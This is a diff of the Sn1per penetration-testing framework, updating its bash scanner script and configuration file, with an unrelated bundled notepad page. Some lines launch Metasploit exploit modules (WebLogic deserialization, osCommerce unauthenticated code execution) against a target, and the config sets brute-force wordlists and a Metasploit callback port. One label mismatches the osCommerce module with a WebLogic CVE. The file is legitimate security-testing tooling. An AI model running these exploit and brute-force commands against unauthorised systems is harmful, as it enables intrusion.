msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
fi
|
||||
source modes/osint_stage_2.sh
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
fi
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
<!DOCTYPE html>
|
||||
<html><head><meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
|
||||
<title>Notepad App</title>
|
||||
<meta charset="utf-8">
|
||||
<!--[if lt IE 9]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
|
||||
<style>
|
||||
html,body{background:#FCFCFC;color:#444;height:100%;width:100%;margin:0;padding:0;overflow:hidden}
|
||||
#notepad{height:100%;width:100%;padding:1%;font-size:12px;line-height:100%;font-family:Menlo,Monaco,Consolas,"Courier New",monospace;box-sizing:border-box}
|
||||
::selection{background:#7D7}
|
||||
::-moz-selection{background:#7D7}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<textarea placeholder="Type here, see it here..." id="notepad">
|
||||
<!--
|
||||
you could do any element w/ contentEditable, but that doesn't fire onchange
|
||||
-->
|
||||
</textarea>
|
||||
<script>
|
||||
/* localstorage polyfill from https://gist.github.com/350433 */
|
||||
("undefined"==typeof window.localStorage||"undefined"==typeof window.sessionStorage)&&function(){function e(f){function e(a){var b;b=new Date;b.setTime(b.getTime()+31536E6);document.cookie="localStorage="+a+("; expires="+b.toGMTString())+"; path=/"}function g(a){a=JSON.stringify(a);"session"==f?window.name=a:e(a)}var d=function(){var a;if("session"==f)a=window.name;else a:{a=document.cookie.split(";");var b,c;for(b=0;b<a.length;b++){for(c=a[b];" "==c.charAt(0);)c=c.substring(1,c.length);if(0==c.indexOf("localStorage=")){a=
|
||||
c.substring(13,c.length);break a}}a=null}return a?JSON.parse(a):{}}();return{length:0,clear:function(){d={};this.length=0;"session"==f?window.name="":e("")},getItem:function(a){return void 0===d[a]?null:d[a]},key:function(a){var b=0,c;for(c in d){if(b==a)return c;b++}return null},removeItem:function(a){delete d[a];this.length--;g(d)},setItem:function(a,b){d[a]=b+"";this.length++;g(d)}}}if("undefined"==typeof window.localStorage)window.localStorage=new e("local");if("undefined"==typeof window.sessionStorage)window.sessionStorage=
|
||||
new e("session")}();
|
||||
|
||||
/* the code */
|
||||
var n = document.getElementById("notepad");
|
||||
/* save */
|
||||
var s = function(){localStorage.setItem("notepad", n.value);}
|
||||
/* retrieve (only on page load) */
|
||||
if(window.localStorage){ n.value = localStorage.getItem("notepad");}
|
||||
/* autosave onchange and every 500ms and when you close the window */
|
||||
n.onchange = s();
|
||||
setInterval( s, 500);
|
||||
window.onunload = s();
|
||||
</script>
|
||||
</body></html>
|
||||
87
sniper
87
sniper
|
|
@ -1,24 +1,25 @@
|
|||
#!/bin/bash
|
||||
# + -- --=[Sn1per by @xer0dayz
|
||||
# + -- --=[Sn1per Community Edition by @xer0dayz
|
||||
# + -- --=[https://xerosecurity.com
|
||||
#
|
||||
|
||||
VER="6.0"
|
||||
VER="6.1"
|
||||
INSTALL_DIR="/usr/share/sniper"
|
||||
LOOT_DIR="$INSTALL_DIR/loot/$TARGET"
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
|
||||
# LOAD SNIPER CONFIGURATION FILE
|
||||
if [ -f ~/.sniper.conf ]; then
|
||||
source ~/.sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
else
|
||||
source $INSTALL_DIR/sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from $INSTALL_DIR/sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
cp $INSTALL_DIR/sniper.conf ~/.sniper.conf 2> /dev/null
|
||||
source ~/.sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
fi
|
||||
|
||||
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
|
||||
|
||||
# REMOVE HOST FROM WORKSPACE sed -i "/www.test.com/d" domains/targets-all-sorted.txt domains/domains-all-sorted.txt domains/targets.txt
|
||||
|
||||
function help {
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
||||
|
|
@ -102,7 +103,7 @@ function logo {
|
|||
}
|
||||
|
||||
function sniper_status {
|
||||
watch -n 1 -c 'ps -ef | egrep "hydra|ruby|python|dirsearch|amass|nmap|metasploit|curl|wget" && echo "NETWORK CONNECTIONS..." && netstat -an | egrep "TIME_WAIT|EST"'
|
||||
watch -n 1 -c 'ps -ef | egrep "hydra|ruby|python|dirsearch|amass|nmap|metasploit|curl|wget|nikto" && echo "NETWORK CONNECTIONS..." && netstat -an | egrep "TIME_WAIT|EST"'
|
||||
}
|
||||
|
||||
function check_online {
|
||||
|
|
@ -121,7 +122,7 @@ function check_online {
|
|||
|
||||
function check_update {
|
||||
if [ "$ENABLE_AUTO_UPDATES" == "1" ] && [ "$ONLINE" == "1" ]; then
|
||||
LATEST_VER=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
if [ "$LATEST_VER" != "$VER" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] sniper v$LATEST_VER is available to download... To update, type$OKRED \"sniper -u\" $RESET"
|
||||
fi
|
||||
|
|
@ -131,10 +132,10 @@ function check_update {
|
|||
function update {
|
||||
logo
|
||||
echo -e "$OKBLUE[*] Checking for updates...[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
if [ "$ONLINE" = "0" ]; then
|
||||
if [ "$ONLINE" == "0" ]; then
|
||||
echo "You will need to download the latest release manually at https://github.com/1N3/Sn1per/"
|
||||
else
|
||||
LATEST_VER=$(curl --connect-timeout 3 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
LATEST_VER=$(curl --connect-timeout 5 -s https://api.github.com/repos/1N3/Sn1per/tags | grep -Po '"name":.*?[^\\]",'| head -1 | cut -c11-13)
|
||||
if [ "$LATEST_VER" != "$VER" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE] Sn1per $LATEST_VER is available to download...Do you want to update? (y or n)$RESET"
|
||||
read ans
|
||||
|
|
@ -207,6 +208,10 @@ case $key in
|
|||
REIMPORT="1"
|
||||
shift # past argument
|
||||
;;
|
||||
-ria|--reimportall)
|
||||
REIMPORT_ALL="1"
|
||||
shift # past argument
|
||||
;;
|
||||
-rl|--reload)
|
||||
RELOAD="1"
|
||||
shift # past argument
|
||||
|
|
@ -231,6 +236,11 @@ case $key in
|
|||
ls -l $INSTALL_DIR/loot/workspace/
|
||||
echo ""
|
||||
echo "cd /usr/share/sniper/loot/workspace/"
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
if [ -f $SNIPER_PRO ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
$BROWSER $INSTALL_DIR/loot/workspace/sniper-report.html 2> /dev/null > /dev/null &
|
||||
fi
|
||||
exit
|
||||
shift
|
||||
;;
|
||||
|
|
@ -261,8 +271,6 @@ if [ -z "$TARGET" ] && [ -z "$WORKSPACE" ]; then
|
|||
exit
|
||||
fi
|
||||
|
||||
LOOT_DIR="/usr/share/sniper/loot/$TARGET"
|
||||
|
||||
cd $INSTALL_DIR
|
||||
|
||||
function init {
|
||||
|
|
@ -277,9 +285,8 @@ function init {
|
|||
mkdir $LOOT_DIR/nmap 2> /dev/null
|
||||
mkdir $LOOT_DIR/reports 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
mkdir $LOOT_DIR/osint 2> /dev/null
|
||||
mkdir $LOOT_DIR/credentials 2> /dev/null
|
||||
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
|
||||
mkdir $LOOT_DIR/exploits 2> /dev/null
|
||||
mkdir $LOOT_DIR/web 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
|
|
@ -302,9 +309,9 @@ function init {
|
|||
if [ "$RECON" == "1" ]; then
|
||||
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
}
|
||||
|
||||
# REMOVE HOST FROM WORKSPACE sed -i "/www.test.com/d" domains/targets-all-sorted.txt domains/domains-all-sorted.txt domains/targets.txt
|
||||
function loot {
|
||||
echo -e "$OKRED ____ $RESET"
|
||||
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
|
||||
|
|
@ -329,39 +336,58 @@ function loot {
|
|||
msfconsole -x "workspace -a $WORKSPACE; workspace $WORKSPACE; db_import $LOOT_DIR/nmap/nmap*.xml; hosts; services; exit;" | tee $LOOT_DIR/notes/msf-$WORKSPACE.txt
|
||||
fi
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Current reports...$RESET"
|
||||
ls -lh $LOOT_DIR/output/*.txt 2> /dev/null > /dev/null
|
||||
echo -e "$OKORANGE + -- --=[Generating reports...$RESET"
|
||||
cd ./output
|
||||
echo -en "$OKGREEN[$OKBLUE"
|
||||
for a in `ls sniper-*.txt 2>/dev/null`;
|
||||
#for a in `sort -u $LOOT_DIR/scans/updated.txt`;
|
||||
do
|
||||
# TXT OUTPUT
|
||||
#cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
|
||||
# HTML OUTPUT
|
||||
cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
|
||||
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
# PDF OUTPUT
|
||||
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
|
||||
echo -n '|'
|
||||
done
|
||||
echo -en "$OKGREEN]$RESET"
|
||||
echo ""
|
||||
cd ..
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Sorting all domains...$RESET"
|
||||
touch $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/*-full.txt > $LOOT_DIR/domains/domains-all-sorted.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
|
||||
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
|
||||
cd $LOOT_DIR/screenshots/
|
||||
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
|
||||
cd $LOOT_DIR
|
||||
|
||||
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
if [ -f $SNIPER_PRO ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
source $INSTALL_DIR/pro.sh
|
||||
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
|
||||
$BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
|
||||
echo -e "$OKORANGE + -- --=[Do you want to load Sn1per Professional (y or n)? $RESET"
|
||||
read ANS
|
||||
if [ "$ANS" == "y" ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
source $INSTALL_DIR/pro.sh
|
||||
$BROWSER $LOOT_DIR/sniper-report.html 2> /dev/null > /dev/null &
|
||||
echo -e "$OKORANGE + -- --=[Opening workspace directory...$RESET"
|
||||
# DISABLED FOR V7 ONLY!
|
||||
#echo -e "$OKORANGE + -- --=[Do you want to load all updated host reports (y or n)? $RESET"
|
||||
#cat $UPDATED_TARGETS 2> /dev/null
|
||||
#read ANS2
|
||||
#if [ "$ANS2" == "y" ]; then
|
||||
#
|
||||
# for a in `cat $UPDATED_TARGETS`; do
|
||||
# $BROWSER "$LOOT_DIR/reports/sniper-$a.html" 2> /dev/null > /dev/null &
|
||||
# done
|
||||
# rm -f $UPDATED_TARGETS 2> /dev/null
|
||||
# touch $UPDATED_TARGETS 2> /dev/null
|
||||
#fi
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Skipping report generation. $RESET"
|
||||
fi
|
||||
else
|
||||
echo -e "$OKRED + -- --=[Sn1per Professional is not installed. To download Sn1per Professional, go to https://xerosecurity.com. $RESET"
|
||||
$BROWSER https://xerosecurity.com 2> /dev/null > /dev/null &
|
||||
|
|
@ -376,6 +402,14 @@ if [ "$REIMPORT" = "1" ]; then
|
|||
fi
|
||||
fi
|
||||
|
||||
if [ "$REIMPORT_ALL" = "1" ]; then
|
||||
if [ ! -z "$WORKSPACE_DIR" ]; then
|
||||
sort -u $WORKSPACE_DIR/domains/targets-all-sorted.txt $WORKSPACE_DIR/domains/domains-all-sorted.txt > $WORKSPACE_DIR/scans/updated.txt
|
||||
loot
|
||||
exit
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ "$RELOAD" = "1" ]; then
|
||||
if [ ! -z "$WORKSPACE_DIR" ]; then
|
||||
$BROWSER $WORKSPACE_DIR/sniper-report.html 2> /dev/null > /dev/null &
|
||||
|
|
@ -386,6 +420,7 @@ fi
|
|||
if [[ ${TARGET:0:1} =~ $REGEX ]];
|
||||
then
|
||||
SCAN_TYPE="IP"
|
||||
|
||||
else
|
||||
SCAN_TYPE="DOMAIN"
|
||||
fi
|
||||
|
|
|
|||
118
sniper.conf
118
sniper.conf
|
|
@ -1,34 +1,7 @@
|
|||
INSTALL_DIR="/usr/share/sniper"
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
PLUGINS_DIR="$INSTALL_DIR/plugins"
|
||||
|
||||
# DEFAULT BROWSER
|
||||
BROWSER="firefox"
|
||||
|
||||
WEB_BRUTE_FAST="$INSTALL_DIR/wordlists/toplist-fast-sorted.txt"
|
||||
WEB_BRUTE_QUICK="$INSTALL_DIR/wordlists/toplist-quick-sorted.txt"
|
||||
WEB_BRUTE_TOPLIST="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
WEB_BRUTE_INSANE="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
DOMAINS_DEFAULT="$PLUGINS_DIR/dnscan/subdomains-10000.txt"
|
||||
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-insane.txt"
|
||||
USER_FILE="$PLUGIN_DIR/brutex/wordlists/simple-users.txt"
|
||||
PASS_FILE="$PLUGIN_DIR/wordlists/password.lst"
|
||||
DNS_FILE="$PLUGIN_DIR/brutex/wordlists/namelist.txt"
|
||||
|
||||
# TOOL DIRECTORIES
|
||||
THEHARVESTER="/usr/share/theharvester/theharvester.py"
|
||||
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
|
||||
DNSDICT6="$INSTALL_DIR/bin/dnsdict6"
|
||||
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
|
||||
|
||||
# PORT SCAN CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
|
||||
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
|
||||
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
|
||||
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
|
||||
|
||||
THREADS="30"
|
||||
|
||||
# COLORS
|
||||
OKBLUE='\033[94m'
|
||||
OKRED='\033[91m'
|
||||
|
|
@ -38,6 +11,7 @@ RESET='\e[0m'
|
|||
REGEX='^[0-9]+$'
|
||||
|
||||
# DEFAULT SETTINGS
|
||||
VERBOSE="0"
|
||||
AUTOBRUTE="0"
|
||||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
|
|
@ -48,15 +22,93 @@ LOOT="1"
|
|||
METASPLOIT_IMPORT="0"
|
||||
SNIPER_PRO_CONSOLE_OUTPUT="0"
|
||||
|
||||
# PLUGINS
|
||||
# DEFAULT BROWSER
|
||||
BROWSER="firefox"
|
||||
|
||||
# BURP 2.0 SCANNER CONFIG
|
||||
BURP_HOST="127.0.0.1"
|
||||
BURP_PORT="1337"
|
||||
|
||||
# METASPLOIT SCANNER CONFIG
|
||||
MSF_LHOST="127.0.0.1"
|
||||
MSF_LPORT="4444"
|
||||
|
||||
# WEB BRUTE FORCE WORDLISTS
|
||||
WEB_BRUTE_STEALTH="$INSTALL_DIR/wordlists/web-brute-stealth.txt"
|
||||
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/web-brute-full.txt"
|
||||
WEB_BRUTE_EXPLOITS="$INSTALL_DIR/wordlists/web-brute-exploits.txt"
|
||||
|
||||
# DOMAIN WORDLISTS
|
||||
DOMAINS_QUICK="$INSTALL_DIR/wordlists/domains-quick.txt"
|
||||
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-default.txt"
|
||||
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-all.txt"
|
||||
|
||||
# DEFAULT USER/PASS WORDLISTS
|
||||
USER_FILE="/usr/share/brutex/wordlists/simple-users.txt"
|
||||
PASS_FILE="/usr/share/brutex/wordlists/password.lst"
|
||||
DNS_FILE="/usr/share/brutex/wordlists/namelist.txt"
|
||||
|
||||
# TOOL DIRECTORIES
|
||||
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
|
||||
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
|
||||
|
||||
# PORT SCAN CONFIGURATIONS
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
|
||||
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
|
||||
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081